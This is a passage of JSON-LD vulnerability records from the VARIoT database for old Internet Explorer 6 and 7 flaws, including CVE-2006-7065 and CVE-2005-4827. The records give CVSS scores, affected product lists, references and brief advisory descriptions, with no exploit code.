"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2006-7065",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-23173",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-7065",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200703-042",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-23173",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23173"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer allows remote attackers to cause a denial of service (crash) via an IFRAME with a certain XML file and XSL stylesheet that triggers a crash in mshtml.dll when a refresh is called, probably a null pointer dereference. Microsoft Internet Explorer is prone to a denial-of-service vulnerability when handling malicious HTML files. \nSuccessfully exploiting this issue allows attackers to consume excessive CPU resources in the affected browser and eventually cause Internet Explorer to crash, causing a denial-of-service",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "BID",
"id": "19364"
},
{
"db": "VULHUB",
"id": "VHN-23173"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-23173",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23173"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2006-7065",
"trust": 2.8
},
{
"db": "BID",
"id": "19364",
"trust": 2.0
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "28343",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-81914",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-23173",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23173"
},
{
"db": "BID",
"id": "19364"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"id": "VAR-200703-0270",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-23173"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:54:04.827000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://canon.jp/"
},
{
"title": "Internet Explorer",
"trust": 0.8,
"url": "http://windows.microsoft.com/en-us/internet-explorer/downloads/ie"
},
{
"title": "Microsoft Internet Explorer Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=157784"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-7065"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/19364"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-08/0163.html"
},
{
"trust": 1.7,
"url": "http://www3.ca.com/be/securityadvisor/vulninfo/vuln.aspx?id=34511"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-7065"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-7065"
},
{
"trust": 0.3,
"url": "http://www.microsoft.com/windows/ie/default.mspx"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23173"
},
{
"db": "BID",
"id": "19364"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-23173"
},
{
"db": "BID",
"id": "19364"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-03-02T00:00:00",
"db": "VULHUB",
"id": "VHN-23173"
},
{
"date": "2006-08-06T00:00:00",
"db": "BID",
"id": "19364"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"date": "2007-03-02T21:18:00",
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"date": "2007-03-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-23173"
},
{
"date": "2016-07-06T14:40:00",
"db": "BID",
"id": "19364"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"date": "2021-07-23T15:06:35.703000",
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer 6 and 7 Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
],
"trust": 0.6
}
}
VAR-200512-0322
Vulnerability from variot - Updated: 2023-12-18 13:21Internet Explorer 6.0, and possibly other versions, allows remote attackers to bypass the same origin security policy and make requests outside of the intended domain by calling open on an XMLHttpRequest object (Microsoft.XMLHTTP) and using tab, newline, and carriage return characters within the first argument (method name), which is supported by some proxy servers that convert tabs to spaces. NOTE: this issue can be leveraged to conduct referer spoofing, HTTP Request Smuggling, and other attacks. Microsoft Internet Explorer is prone to a weakness that permits the injection of arbitrary HTTP requests due to improper verification of parameters passed to XmlHttpRequest. An attacker may craft a website that instantiates the affected control and forces the browser to request a site on the same host (or another host in case a forwarding proxy is employed). The attacker would then intercept the response and steal sensitive data to aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200512-0322",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2600"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2600"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
}
],
"sources": [
{
"db": "BID",
"id": "14969"
},
{
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_2000:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98_se:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windowsxp:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:windows_2000:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:windows_xp:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium_systems:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp2:windows_xp:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:microsoft_windows_server_2003_sp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_millennium:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-4827"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovery is credited to Amit Klein.",
"sources": [
{
"db": "BID",
"id": "14969"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
],
"trust": 0.9
},
"cve": "CVE-2005-4827",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-16035",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-4827",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200512-877",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-16035",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-16035"
},
{
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Internet Explorer 6.0, and possibly other versions, allows remote attackers to bypass the same origin security policy and make requests outside of the intended domain by calling open on an XMLHttpRequest object (Microsoft.XMLHTTP) and using tab, newline, and carriage return characters within the first argument (method name), which is supported by some proxy servers that convert tabs to spaces. NOTE: this issue can be leveraged to conduct referer spoofing, HTTP Request Smuggling, and other attacks. Microsoft Internet Explorer is prone to a weakness that permits the injection of arbitrary HTTP requests due to improper verification of parameters passed to XmlHttpRequest. \nAn attacker may craft a website that instantiates the affected control and forces the browser to request a site on the same host (or another host in case a forwarding proxy is employed). The attacker would then intercept the response and steal sensitive data to aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"db": "BID",
"id": "14969"
},
{
"db": "VULHUB",
"id": "VHN-16035"
}
],
"trust": 1.26
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-4827",
"trust": 2.0
},
{
"db": "BID",
"id": "14969",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-16035",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-16035"
},
{
"db": "BID",
"id": "14969"
},
{
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"id": "VAR-200512-0322",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-16035"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:21:05.735000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-4827"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/14969"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/411585"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/459172/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2007/feb/0081.html"
},
{
"trust": 0.3,
"url": "/archive/1/411585"
},
{
"trust": 0.3,
"url": "/archive/1/459172"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-16035"
},
{
"db": "BID",
"id": "14969"
},
{
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-16035"
},
{
"db": "BID",
"id": "14969"
},
{
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-16035"
},
{
"date": "2005-09-24T00:00:00",
"db": "BID",
"id": "14969"
},
{
"date": "2005-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"date": "2005-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-16035"
},
{
"date": "2015-05-12T19:52:00",
"db": "BID",
"id": "14969"
},
{
"date": "2021-07-23T15:04:41.580000",
"db": "NVD",
"id": "CVE-2005-4827"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft Internet Explorer XmlHttpRequest Parameter validation vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-877"
}
],
"trust": 0.6
}
}
VAR-200607-0093
Vulnerability from variot - Updated: 2023-12-18 12:47Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by setting the Filter property of an ADODB.Recordset ActiveX object to certain values multiple times, which triggers a null dereference. Microsoft Internet Explorer is prone to a denial-of-service condition when processing the 'ADODB.Recordset Filter Property' COM object. A successful attack may cause the browser to fail due to a null-pointer dereference. Microsoft Internet Explorer is a very popular WEB browser released by Microsoft. When the properties of the ADODB.Recordset ActiveX object are assigned different values three times, the null pointer reference problem will be triggered. If the user is tricked into accessing a malicious WEB page containing malformed ActiveX reference code, it will cause IE to deny service
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200607-0093",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
